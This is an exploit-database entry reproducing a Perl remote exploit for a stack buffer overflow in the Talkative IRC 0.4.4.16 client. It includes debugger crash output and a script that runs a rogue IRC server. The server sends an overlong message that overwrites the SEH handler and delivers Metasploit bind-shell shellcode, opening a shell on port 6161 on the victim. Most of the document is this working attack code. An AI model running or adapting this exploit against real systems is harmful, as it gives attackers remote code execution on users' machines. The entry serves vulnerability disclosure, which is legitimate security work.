Talkative IRC 0.4.4.16 Remote Stack Overflow Exploit (SEH)

2009-03-19T00:00:00
ID SSV:10837
Type seebug
Reporter Root
Modified 2009-03-19T00:00:00

Description

No description provided by source.

                                        
                                            
                                                #!/usr/bin/perl
#
# Title: Talkative IRC 0.4.4.16 Remote Stack Overflow Exploit (SEH)
#
# Summary: The easiest and fastest way to meet people online. With Talkative IRC you can
# chat with thousands of people at the same time. Find people with the same interests as you.
# Join channels where you can meet people speaking your language, or start your own. No
# monthly fees or other hassle, just a download and a click. Version 0.4.4.16 makes nick list
# font customizable. Why Talkative? Mainly because it\'s secure, stable and easy to use.
#
# Product web page: http://www.talkative-irc.com/
#
# Desc: Talkative IRC 0.4.4.16 suffers from a stack based buffer overflow vulnerability that enables us
# to gain full control over the application and execute arbitrary commands. ECX and EIP registers gets
# overwriten, so does the SEH.
#
# Tested on Microsoft Windows XP Professional SP2 (English)
#
# Ref: http://www.milw0rm.com/exploits/6654
#
#
#---------------------------------------------windbg output--------------------------------------------------
#
# (398.ca4): Unknown exception - code 0eedfade (first chance)
# (398.3f8): Unknown exception - code 0eedfade (first chance)
# (398.3f8): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=41414141 ebx=00000000 ecx=0013f0d0 edx=00000008 esi=00000000 edi=00421c40
# eip=004d8260 esp=0013f08c ebp=0013f1c4 iopl=0         nv up ei pl nz na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
# *** WARNING: Unable to verify checksum for image00400000
# *** ERROR: Module load completed but symbols could not be loaded for image00400000
# image00400000+0xd8260:
# 004d8260 8b40f0          mov     eax,dword ptr [eax-10h] ds:0023:41414131=????????
# 0:000> g
# (398.3f8): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000000 ebx=00000000 ecx=42424242 edx=7c9037d8 esi=00000000 edi=00000000
# eip=42424242 esp=0013ecbc ebp=0013ecdc iopl=0         nv up ei pl zr na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
# 42424242 ??              ???
#
#---------------------------------------------windbg output--------------------------------------------------
#
#
# Vulnerability discovered by Gjoko \'LiquidWorm\' Krstic
#
# http://www.zeroscience.org/
#
# liquidworm {z} gmail {z} com
#
# 17.03.2009
#

use IO::Socket;

sub start_zerver()
{
	my $sock = new IO::Socket::INET(
					Listen	   =>	1,
					LocalAddr   =>	\'localhost\',
					LocalPort	   =>	6667,
					Proto	   =>	\'tcp\'
					);
			die unless $sock;

header();

print \"\\n [*] Evil IRC Server started on port 6667\\n\";

my $wire = $sock -> accept();  

my $junky = \"A\" x 272;
my $next_seh = \"\\xeb\\x06\\x90\\x90\";
my $seh = \"\\x9a\\x72\\x85\\x7c\";	#0x7C85729A pop pop ret kernel32.dll 
my $nop_start = \"\\x90\" x 25;
my $nop_end = \"\\x90\" x 10;

# win32_bind -  EXITFUNC=seh LPORT=6161 Size=709 Encoder=PexAlphaNum http://metasploit.com
my $shellcode =
		\"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49\".
		\"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36\".
		\"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34\".
		\"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41\".
		\"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4c\\x36\\x4b\\x4e\".
		\"\\x4d\\x44\\x4a\\x4e\\x49\\x4f\\x4f\\x4f\\x4f\\x4f\\x4f\\x4f\\x42\\x36\\x4b\\x58\".
		\"\\x4e\\x46\\x46\\x42\\x46\\x32\\x4b\\x48\\x45\\x54\\x4e\\x33\\x4b\\x58\\x4e\\x37\".
		\"\\x45\\x50\\x4a\\x57\\x41\\x30\\x4f\\x4e\\x4b\\x58\\x4f\\x44\\x4a\\x31\\x4b\\x58\".
		\"\\x4f\\x35\\x42\\x32\\x41\\x30\\x4b\\x4e\\x49\\x34\\x4b\\x48\\x46\\x33\\x4b\\x48\".
		\"\\x41\\x30\\x50\\x4e\\x41\\x53\\x42\\x4c\\x49\\x59\\x4e\\x4a\\x46\\x58\\x42\\x4c\".
		\"\\x46\\x37\\x47\\x30\\x41\\x4c\\x4c\\x4c\\x4d\\x50\\x41\\x30\\x44\\x4c\\x4b\\x4e\".
		\"\\x46\\x4f\\x4b\\x53\\x46\\x55\\x46\\x52\\x4a\\x42\\x45\\x37\\x45\\x4e\\x4b\\x58\".
		\"\\x4f\\x45\\x46\\x52\\x41\\x30\\x4b\\x4e\\x48\\x46\\x4b\\x38\\x4e\\x30\\x4b\\x54\".
		\"\\x4b\\x48\\x4f\\x35\\x4e\\x41\\x41\\x50\\x4b\\x4e\\x43\\x30\\x4e\\x42\\x4b\\x48\".
		\"\\x49\\x58\\x4e\\x36\\x46\\x32\\x4e\\x31\\x41\\x56\\x43\\x4c\\x41\\x33\\x4b\\x4d\".
		\"\\x46\\x36\\x4b\\x38\\x43\\x54\\x42\\x43\\x4b\\x38\\x42\\x54\\x4e\\x30\\x4b\\x58\".
		\"\\x42\\x57\\x4e\\x41\\x4d\\x4a\\x4b\\x38\\x42\\x34\\x4a\\x30\\x50\\x35\\x4a\\x56\".
		\"\\x50\\x48\\x50\\x54\\x50\\x30\\x4e\\x4e\\x42\\x35\\x4f\\x4f\\x48\\x4d\\x48\\x56\".
		\"\\x43\\x55\\x48\\x46\\x4a\\x46\\x43\\x33\\x44\\x53\\x4a\\x56\\x47\\x37\\x43\\x47\".
		\"\\x44\\x33\\x4f\\x35\\x46\\x45\\x4f\\x4f\\x42\\x4d\\x4a\\x36\\x4b\\x4c\\x4d\\x4e\".
		\"\\x4e\\x4f\\x4b\\x33\\x42\\x35\\x4f\\x4f\\x48\\x4d\\x4f\\x35\\x49\\x38\\x45\\x4e\".
		\"\\x48\\x46\\x41\\x48\\x4d\\x4e\\x4a\\x50\\x44\\x30\\x45\\x45\\x4c\\x56\\x44\\x50\".
		\"\\x4f\\x4f\\x42\\x4d\\x4a\\x46\\x49\\x4d\\x49\\x50\\x45\\x4f\\x4d\\x4a\\x47\\x35\".
		\"\\x4f\\x4f\\x48\\x4d\\x43\\x45\\x43\\x35\\x43\\x55\\x43\\x45\\x43\\x45\\x43\\x34\".
		\"\\x43\\x35\\x43\\x54\\x43\\x35\\x4f\\x4f\\x42\\x4d\\x48\\x56\\x4a\\x36\\x4a\\x51\".
		\"\\x41\\x51\\x48\\x46\\x43\\x55\\x49\\x38\\x41\\x4e\\x45\\x39\\x4a\\x46\\x46\\x4a\".
		\"\\x4c\\x51\\x42\\x37\\x47\\x4c\\x47\\x45\\x4f\\x4f\\x48\\x4d\\x4c\\x36\\x42\\x31\".
		\"\\x41\\x35\\x45\\x35\\x4f\\x4f\\x42\\x4d\\x4a\\x46\\x46\\x4a\\x4d\\x4a\\x50\\x42\".
		\"\\x49\\x4e\\x47\\x35\\x4f\\x4f\\x48\\x4d\\x43\\x55\\x45\\x35\\x4f\\x4f\\x42\\x4d\".
		\"\\x4a\\x56\\x45\\x4e\\x49\\x44\\x48\\x38\\x49\\x34\\x47\\x35\\x4f\\x4f\\x48\\x4d\".
		\"\\x42\\x55\\x46\\x35\\x46\\x45\\x45\\x35\\x4f\\x4f\\x42\\x4d\\x43\\x59\\x4a\\x46\".
		\"\\x47\\x4e\\x49\\x37\\x48\\x4c\\x49\\x37\\x47\\x35\\x4f\\x4f\\x48\\x4d\\x45\\x35\".
		\"\\x4f\\x4f\\x42\\x4d\\x48\\x36\\x4c\\x56\\x46\\x56\\x48\\x46\\x4a\\x36\\x43\\x36\".
		\"\\x4d\\x56\\x49\\x48\\x45\\x4e\\x4c\\x56\\x42\\x35\\x49\\x45\\x49\\x42\\x4e\\x4c\".
		\"\\x49\\x38\\x47\\x4e\\x4c\\x46\\x46\\x34\\x49\\x58\\x44\\x4e\\x41\\x53\\x42\\x4c\".
		\"\\x43\\x4f\\x4c\\x4a\\x50\\x4f\\x44\\x54\\x4d\\x42\\x50\\x4f\\x44\\x34\\x4e\\x52\".
		\"\\x43\\x59\\x4d\\x48\\x4c\\x57\\x4a\\x53\\x4b\\x4a\\x4b\\x4a\\x4b\\x4a\\x4a\\x56\".
		\"\\x44\\x37\\x50\\x4f\\x43\\x4b\\x48\\x31\\x4f\\x4f\\x45\\x37\\x46\\x34\\x4f\\x4f\".
		\"\\x48\\x4d\\x4b\\x45\\x47\\x55\\x44\\x55\\x41\\x35\\x41\\x45\\x41\\x45\\x4c\\x56\".
		\"\\x41\\x50\\x41\\x45\\x41\\x55\\x45\\x55\\x41\\x45\\x4f\\x4f\\x42\\x4d\\x4a\\x46\".
		\"\\x4d\\x4a\\x49\\x4d\\x45\\x30\\x50\\x4c\\x43\\x45\\x4f\\x4f\\x48\\x4d\\x4c\\x56\".
		\"\\x4f\\x4f\\x4f\\x4f\\x47\\x43\\x4f\\x4f\\x42\\x4d\\x4b\\x48\\x47\\x35\\x4e\\x4f\".
		\"\\x43\\x58\\x46\\x4c\\x46\\x56\\x4f\\x4f\\x48\\x4d\\x44\\x45\\x4f\\x4f\\x42\\x4d\".
		\"\\x4a\\x36\\x42\\x4f\\x4c\\x48\\x46\\x30\\x4f\\x45\\x43\\x45\\x4f\\x4f\\x48\\x4d\".
		\"\\x4f\\x4f\\x42\\x4d\\x5a\";

print \" [*] Throwing payload...\\r\\n\";
  
print $wire \":irc_server.stuff 001 jox :Welcome to the Internet Relay Network jox\\r\\n\"; 

sleep(1);

print $wire \":\" . \"$junky\" . \"$next_seh\" . \"$seh\" . \"$nop_start\" . \"$shellcode\" . \"$nop_end\" . \" PRIVMSG t00t : /FINGER w00t.\\r\\n\";
}

while (1)
{
	start_zerver();
	print \" [*] Talkative IRC client successfully exploited!\\r\\n\\n\";
	print \" [**] Check shell on port 6161! [**]\\r\\n\";
	next;
}

sub header()
{
	print \"\\n\";
	print \"~\" x 80;
	print \"\\n\";
	print \"	Talkative IRC v0.4.4.16 Remote Stack Overflow Exploit (SEH)\\n\";
	print \"			by LiquidWorm (c) 2009\\n\\n\";
	print \"~\" x 80;
	print \"\\n\\n\";
}